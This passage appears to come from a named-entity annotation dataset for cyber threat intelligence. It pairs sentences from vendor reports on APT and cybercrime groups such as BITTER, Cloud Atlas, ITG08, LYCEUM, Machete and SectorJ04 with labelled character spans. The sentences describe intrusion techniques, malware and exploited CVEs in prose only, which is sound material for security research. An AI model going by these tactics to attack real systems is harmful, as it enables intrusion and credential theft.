malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . Based on the Let\u2019s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . Further analysis of the BITTER APT\u2019s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group\u2019s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user\u2019s credentials . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People\u2019s Republic of China . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . Here , we investigate a campaign targeting an Asian government organization . We observed another campaign targeting an organisation located in Lebanon . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . During its recent campaigns , Cloud Atlas used a new polymorphic\u201d infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . In one article published in the Kharkiv Observer \u2013 an independent Ukranian online publication \u2013 an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites \u2014 a technique known as online skimming \u2014 thereby stealing payment card data transmitted to the vendor by unsuspecting customers . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Attackers use it to create , expand and cement their foothold in compromised environments . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library ( DLL ) , as described below , to create a reverse shell and connect to a remote host . Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . After injecting Meterpreter into memory , the attacker had complete control of the infected device . IBM X-Force IRIS has gained insight into ITG08\u2019s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08\u2019s use of PowerShell to conduct malicious activity . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . CTU research indicates that LYCEUM may have been active as early as April 2018 . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The developer consistently used Accept-Enconding\u201d (note the extra \u2018n\u2019) in all DanBot samples analyzed by CTU researchers . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . This focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . Aside from deploying novel malware , LYCEUM\u2019s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . ESET has been tracking a new version of Machete (the group\u2019s Python-based toolset) that was first seen in April 2018 . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . Machete is interested in files that describe navigation routes and positioning using military grids . The Machete group sends very specific emails directly to its victims , and these change from target to target . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . This ACT , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . The group behind Machete uses effective spearphishing techniques . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . In 2018 Machete reappeared with new code and new features . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . Machete was active and constantly working on very effective spearphishing campaigns . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Machete relies on spearphishing to compromise its targets . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . By introducing small changes to their code and infrastructure , the group has bypassed several security products . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group\u2019s hacking . In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker\u2019s server . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The SectorJ04 group\u2019s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their LOCs of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 38, "end": 49, "label": "Organization"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 196, "end": 214, "label": "System"}, {"start": 215, "end": 220, "label": "System"}, {"start": 357, "end": 362, "label": "Organization"}, {"start": 493, "end": 498, "label": "Organization"}, {"start": 692, "end": 699, "label": "Organization"}, {"start": 737, "end": 756, "label": "Organization"}, {"start": 793, "end": 802, "label": "Indicator"}, {"start": 914, "end": 924, "label": "Indicator"}, {"start": 1056, "end": 1062, "label": "System"}, {"start": 1121, "end": 1130, "label": "Organization"}, {"start": 1160, "end": 1169, "label": "Organization"}, {"start": 1278, "end": 1294, "label": "Organization"}, {"start": 1525, "end": 1532, "label": "Organization"}, {"start": 1711, "end": 1721, "label": "Organization"}, {"start": 1771, "end": 1778, "label": "Vulnerability"}, {"start": 1786, "end": 1792, "label": "System"}, {"start": 1811, "end": 1825, "label": "Vulnerability"}, {"start": 1833, "end": 1842, "label": "Indicator"}, {"start": 1847, "end": 1857, "label": "Indicator"}, {"start": 2111, "end": 2121, "label": "Indicator"}, {"start": 2270, "end": 2277, "label": "Vulnerability"}, {"start": 2282, "end": 2288, "label": "System"}, {"start": 2307, "end": 2321, "label": "Vulnerability"}, {"start": 2358, "end": 2366, "label": "Organization"}, {"start": 2424, "end": 2433, "label": "Malware"}, {"start": 2489, "end": 2508, "label": "Malware"}, {"start": 2555, "end": 2560, "label": "Organization"}, {"start": 2571, "end": 2581, "label": "Malware"}, {"start": 2586, "end": 2591, "label": "System"}, {"start": 2665, "end": 2670, "label": "System"}, {"start": 2689, "end": 2697, "label": "Indicator"}, {"start": 2809, "end": 2826, "label": "Indicator"}, {"start": 2918, "end": 2925, "label": "Organization"}, {"start": 2926, "end": 2936, "label": "Malware"}, {"start": 3209, "end": 3216, "label": "Organization"}, {"start": 3399, "end": 3407, "label": "Organization"}, {"start": 3429, "end": 3439, "label": "Organization"}, {"start": 3487, "end": 3499, "label": "Organization"}, {"start": 3569, "end": 3585, "label": "Organization"}, {"start": 3602, "end": 3613, "label": "Organization"}, {"start": 3732, "end": 3742, "label": "Organization"}, {"start": 3762, "end": 3775, "label": "Organization"}, {"start": 3804, "end": 3814, "label": "Organization"}, {"start": 3840, "end": 3850, "label": "Organization"}, {"start": 3998, "end": 4000, "label": "Indicator"}, {"start": 4049, "end": 4059, "label": "Organization"}, {"start": 4074, "end": 4093, "label": "Organization"}, {"start": 4151, "end": 4159, "label": "Organization"}, {"start": 4246, "end": 4256, "label": "Organization"}, {"start": 4402, "end": 4412, "label": "Organization"}, {"start": 4546, "end": 4553, "label": "Organization"}, {"start": 4669, "end": 4674, "label": "System"}, {"start": 4769, "end": 4799, "label": "Organization"}, {"start": 4855, "end": 4865, "label": "Organization"}, {"start": 4936, "end": 4949, "label": "Malware"}, {"start": 5018, "end": 5027, "label": "Organization"}, {"start": 5032, "end": 5049, "label": "Organization"}, {"start": 5127, "end": 5140, "label": "Indicator"}, {"start": 5163, "end": 5172, "label": "Organization"}, {"start": 5301, "end": 5312, "label": "Organization"}, {"start": 5336, "end": 5349, "label": "Malware"}, {"start": 5461, "end": 5470, "label": "Organization"}, {"start": 5481, "end": 5494, "label": "Malware"}, {"start": 5583, "end": 5606, "label": "Organization"}, {"start": 5685, "end": 5698, "label": "Indicator"}, {"start": 5725, "end": 5741, "label": "System"}, {"start": 5946, "end": 5959, "label": "Indicator"}, {"start": 5963, "end": 5978, "label": "Indicator"}, {"start": 5985, "end": 5989, "label": "Indicator"}, {"start": 6120, "end": 6125, "label": "Organization"}, {"start": 6138, "end": 6145, "label": "Vulnerability"}, {"start": 6146, "end": 6159, "label": "Vulnerability"}, {"start": 6188, "end": 6201, "label": "Vulnerability"}, {"start": 6205, "end": 6212, "label": "System"}, {"start": 6324, "end": 6340, "label": "Vulnerability"}, {"start": 6341, "end": 6348, "label": "Vulnerability"}, {"start": 6355, "end": 6363, "label": "Organization"}, {"start": 6522, "end": 6529, "label": "System"}, {"start": 6544, "end": 6555, "label": "Organization"}, {"start": 6596, "end": 6602, "label": "System"}, {"start": 6910, "end": 6921, "label": "Organization"}, {"start": 6952, "end": 6961, "label": "Organization"}, {"start": 7014, "end": 7027, "label": "Indicator"}, {"start": 7089, "end": 7096, "label": "Vulnerability"}, {"start": 7120, "end": 7127, "label": "Vulnerability"}, {"start": 7132, "end": 7139, "label": "System"}, {"start": 7156, "end": 7169, "label": "Vulnerability"}, {"start": 7172, "end": 7185, "label": "Vulnerability"}, {"start": 7190, "end": 7203, "label": "Vulnerability"}, {"start": 7217, "end": 7225, "label": "Organization"}, {"start": 7279, "end": 7290, "label": "Organization"}, {"start": 7373, "end": 7382, "label": "Organization"}, {"start": 7406, "end": 7420, "label": "Vulnerability"}, {"start": 7432, "end": 7445, "label": "Vulnerability"}, {"start": 7497, "end": 7508, "label": "Organization"}, {"start": 7552, "end": 7563, "label": "Organization"}, {"start": 7653, "end": 7664, "label": "Organization"}, {"start": 7893, "end": 7908, "label": "Organization"}, {"start": 7978, "end": 7988, "label": "Organization"}, {"start": 7993, "end": 8001, "label": "Organization"}, {"start": 8135, "end": 8150, "label": "Organization"}, {"start": 8342, "end": 8369, "label": "Organization"}, {"start": 8416, "end": 8431, "label": "Organization"}, {"start": 8434, "end": 8449, "label": "Organization"}, {"start": 8477, "end": 8490, "label": "Organization"}, {"start": 8569, "end": 8578, "label": "Malware"}, {"start": 8594, "end": 8598, "label": "Organization"}, {"start": 8674, "end": 8679, "label": "Malware"}, {"start": 8749, "end": 8756, "label": "Indicator"}, {"start": 8795, "end": 8801, "label": "System"}, {"start": 8817, "end": 8830, "label": "Vulnerability"}, {"start": 8992, "end": 8997, "label": "Organization"}, {"start": 9014, "end": 9018, "label": "Organization"}, {"start": 9037, "end": 9042, "label": "Organization"}, {"start": 9071, "end": 9094, "label": "Organization"}, {"start": 9334, "end": 9339, "label": "Organization"}, {"start": 9442, "end": 9447, "label": "Organization"}, {"start": 9579, "end": 9588, "label": "Organization"}, {"start": 9610, "end": 9628, "label": "Organization"}, {"start": 9672, "end": 9677, "label": "Organization"}, {"start": 9688, "end": 9706, "label": "Malware"}, {"start": 9745, "end": 9754, "label": "Organization"}, {"start": 9846, "end": 9851, "label": "Organization"}, {"start": 9857, "end": 9889, "label": "Malware"}, {"start": 9968, "end": 9975, "label": "Organization"}, {"start": 10131, "end": 10149, "label": "Indicator"}, {"start": 10183, "end": 10200, "label": "Indicator"}, {"start": 10284, "end": 10291, "label": "Indicator"}, {"start": 10294, "end": 10306, "label": "Organization"}, {"start": 10327, "end": 10345, "label": "Indicator"}, {"start": 10438, "end": 10458, "label": "System"}, {"start": 10461, "end": 10464, "label": "System"}, {"start": 10556, "end": 10561, "label": "Organization"}, {"start": 10616, "end": 10619, "label": "Malware"}, {"start": 10624, "end": 10634, "label": "Malware"}, {"start": 10728, "end": 10737, "label": "Organization"}, {"start": 10799, "end": 10802, "label": "Indicator"}, {"start": 10908, "end": 10917, "label": "Malware"}, {"start": 10928, "end": 10933, "label": "Organization"}, {"start": 11005, "end": 11013, "label": "Malware"}, {"start": 11084, "end": 11089, "label": "Organization"}, {"start": 11113, "end": 11139, "label": "Malware"}, {"start": 11142, "end": 11150, "label": "Indicator"}, {"start": 11309, "end": 11315, "label": "System"}, {"start": 11349, "end": 11354, "label": "Organization"}, {"start": 11377, "end": 11403, "label": "Malware"}, {"start": 11478, "end": 11487, "label": "Malware"}, {"start": 11504, "end": 11509, "label": "Organization"}, {"start": 11537, "end": 11561, "label": "Malware"}, {"start": 11566, "end": 11584, "label": "Malware"}, {"start": 11681, "end": 11689, "label": "Organization"}, {"start": 11736, "end": 11752, "label": "Organization"}, {"start": 11777, "end": 11784, "label": "Organization"}, {"start": 11867, "end": 11872, "label": "Malware"}, {"start": 11977, "end": 11982, "label": "Organization"}, {"start": 11992, "end": 12010, "label": "Malware"}, {"start": 12088, "end": 12098, "label": "System"}, {"start": 12172, "end": 12179, "label": "Organization"}, {"start": 12187, "end": 12197, "label": "Malware"}, {"start": 12234, "end": 12240, "label": "Organization"}, {"start": 12290, "end": 12319, "label": "Organization"}, {"start": 12332, "end": 12343, "label": "Organization"}, {"start": 12357, "end": 12375, "label": "Organization"}, {"start": 12378, "end": 12381, "label": "Organization"}, {"start": 12406, "end": 12412, "label": "Organization"}, {"start": 12799, "end": 12811, "label": "Organization"}, {"start": 12833, "end": 12839, "label": "Organization"}, {"start": 12842, "end": 12849, "label": "Organization"}, {"start": 12856, "end": 12861, "label": "Organization"}, {"start": 12866, "end": 12880, "label": "Organization"}, {"start": 12895, "end": 12900, "label": "Organization"}, {"start": 12905, "end": 12910, "label": "Organization"}, {"start": 12918, "end": 12921, "label": "Organization"}, {"start": 12968, "end": 12974, "label": "Organization"}, {"start": 13096, "end": 13102, "label": "Organization"}, {"start": 13122, "end": 13128, "label": "System"}, {"start": 13221, "end": 13241, "label": "Malware"}, {"start": 13322, "end": 13328, "label": "Indicator"}, {"start": 13349, "end": 13352, "label": "Organization"}, {"start": 13367, "end": 13380, "label": "Malware"}, {"start": 13386, "end": 13403, "label": "Malware"}, {"start": 13470, "end": 13476, "label": "Organization"}, {"start": 13500, "end": 13506, "label": "Malware"}, {"start": 13575, "end": 13581, "label": "Organization"}, {"start": 13602, "end": 13609, "label": "Malware"}, {"start": 13770, "end": 13778, "label": "Organization"}, {"start": 13792, "end": 13802, "label": "Organization"}, {"start": 13805, "end": 13813, "label": "Organization"}, {"start": 13820, "end": 13832, "label": "Organization"}, {"start": 13875, "end": 13881, "label": "Malware"}, {"start": 13906, "end": 13909, "label": "Organization"}, {"start": 13913, "end": 13921, "label": "Organization"}, {"start": 13924, "end": 13930, "label": "Organization"}, {"start": 13998, "end": 14001, "label": "Organization"}, {"start": 14054, "end": 14060, "label": "Organization"}, {"start": 14155, "end": 14161, "label": "Organization"}, {"start": 14187, "end": 14207, "label": "Organization"}, {"start": 14357, "end": 14365, "label": "Organization"}, {"start": 14401, "end": 14404, "label": "Organization"}, {"start": 14649, "end": 14655, "label": "Organization"}, {"start": 14779, "end": 14787, "label": "Organization"}, {"start": 14788, "end": 14801, "label": "Organization"}, {"start": 14804, "end": 14811, "label": "Organization"}, {"start": 14904, "end": 14911, "label": "Malware"}, {"start": 14959, "end": 14963, "label": "Organization"}, {"start": 14999, "end": 15006, "label": "Organization"}, {"start": 15020, "end": 15032, "label": "System"}, {"start": 15138, "end": 15157, "label": "Organization"}, {"start": 15210, "end": 15217, "label": "Organization"}, {"start": 15228, "end": 15233, "label": "Organization"}, {"start": 15377, "end": 15384, "label": "Organization"}, {"start": 15413, "end": 15439, "label": "Organization"}, {"start": 15483, "end": 15490, "label": "Organization"}, {"start": 15517, "end": 15523, "label": "System"}, {"start": 15595, "end": 15602, "label": "Organization"}, {"start": 15723, "end": 15740, "label": "Indicator"}, {"start": 15759, "end": 15768, "label": "Organization"}, {"start": 15781, "end": 15788, "label": "Organization"}, {"start": 15823, "end": 15830, "label": "Organization"}, {"start": 15903, "end": 15919, "label": "Indicator"}, {"start": 15979, "end": 15982, "label": "System"}, {"start": 15992, "end": 15996, "label": "Organization"}, {"start": 16113, "end": 16120, "label": "Indicator"}, {"start": 16382, "end": 16389, "label": "Organization"}, {"start": 16618, "end": 16627, "label": "Organization"}, {"start": 16771, "end": 16775, "label": "Organization"}, {"start": 16879, "end": 16887, "label": "Organization"}, {"start": 16921, "end": 16928, "label": "Organization"}, {"start": 16990, "end": 16999, "label": "Organization"}, {"start": 17027, "end": 17034, "label": "Organization"}, {"start": 17049, "end": 17056, "label": "Organization"}, {"start": 17182, "end": 17189, "label": "Organization"}, {"start": 17252, "end": 17256, "label": "Organization"}, {"start": 17311, "end": 17318, "label": "Organization"}, {"start": 17393, "end": 17401, "label": "Organization"}, {"start": 17411, "end": 17418, "label": "Organization"}, {"start": 17533, "end": 17540, "label": "Organization"}, {"start": 17635, "end": 17642, "label": "Organization"}, {"start": 17731, "end": 17738, "label": "Organization"}, {"start": 17791, "end": 17795, "label": "Organization"}, {"start": 17837, "end": 17845, "label": "Organization"}, {"start": 17954, "end": 17963, "label": "Organization"}, {"start": 18019, "end": 18027, "label": "Organization"}, {"start": 18085, "end": 18091, "label": "System"}, {"start": 18111, "end": 18118, "label": "Organization"}, {"start": 18357, "end": 18361, "label": "Organization"}, {"start": 18453, "end": 18456, "label": "System"}, {"start": 18537, "end": 18545, "label": "Organization"}, {"start": 18592, "end": 18599, "label": "Organization"}, {"start": 18602, "end": 18609, "label": "Organization"}, {"start": 18841, "end": 18854, "label": "Organization"}, {"start": 19013, "end": 19023, "label": "Organization"}, {"start": 19250, "end": 19254, "label": "Indicator"}, {"start": 19458, "end": 19469, "label": "Organization"}, {"start": 19720, "end": 19726, "label": "Organization"}, {"start": 19788, "end": 19797, "label": "Organization"}, {"start": 19924, "end": 19933, "label": "Organization"}, {"start": 19966, "end": 19975, "label": "Organization"}, {"start": 20031, "end": 20049, "label": "Organization"}, {"start": 20201, "end": 20210, "label": "Organization"}, {"start": 20437, "end": 20448, "label": "Organization"}, {"start": 20645, "end": 20655, "label": "Organization"}, {"start": 20672, "end": 20681, "label": "Organization"}, {"start": 20763, "end": 20772, "label": "Organization"}, {"start": 20826, "end": 20830, "label": "System"}, {"start": 20865, "end": 20879, "label": "Indicator"}, {"start": 20894, "end": 20903, "label": "Organization"}, {"start": 20947, "end": 20955, "label": "Organization"}, {"start": 21024, "end": 21033, "label": "Organization"}, {"start": 21067, "end": 21089, "label": "Organization"}, {"start": 21267, "end": 21274, "label": "Organization"}, {"start": 21277, "end": 21291, "label": "Organization"}, {"start": 21294, "end": 21299, "label": "Organization"}, {"start": 21302, "end": 21308, "label": "Organization"}, {"start": 21313, "end": 21326, "label": "Organization"}, {"start": 21344, "end": 21353, "label": "Organization"}, {"start": 21393, "end": 21403, "label": "Malware"}, {"start": 21408, "end": 21422, "label": "Malware"}]}
{"text": "Kaspersky Lab\u2019s experts calculated the amount of stolen data stored on NetTraveler\u2019s C&C servers to be more than 22 gigabytes . Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker\u2019s server . Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImporter , along with its banking Trojan , on its victims computers . In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards . The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines . In June , SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written with various contents , including remittance card , invoice and tax invoice . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi . AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor . Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 . The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam . This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company\u2019s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea\u2019s media , manufacturing and universities , around February and March 2019 . SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker\u2019s server when the malicious documents were run . SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea . In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . Now , Silence is one of the most active threat actors targeting the financial sector . Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence\u2019s activity . Since the report\u2019s release in September 2018 , Group-IB\u2019s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . Like the majority of APT groups , Silence uses phishing as their infection vector . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . Prior to April 2018 , as described in Group-IB\u2019s Silence: Moving into the darkside report , Silence\u2019s target interests were primarily limited to former Soviet and Eastern European 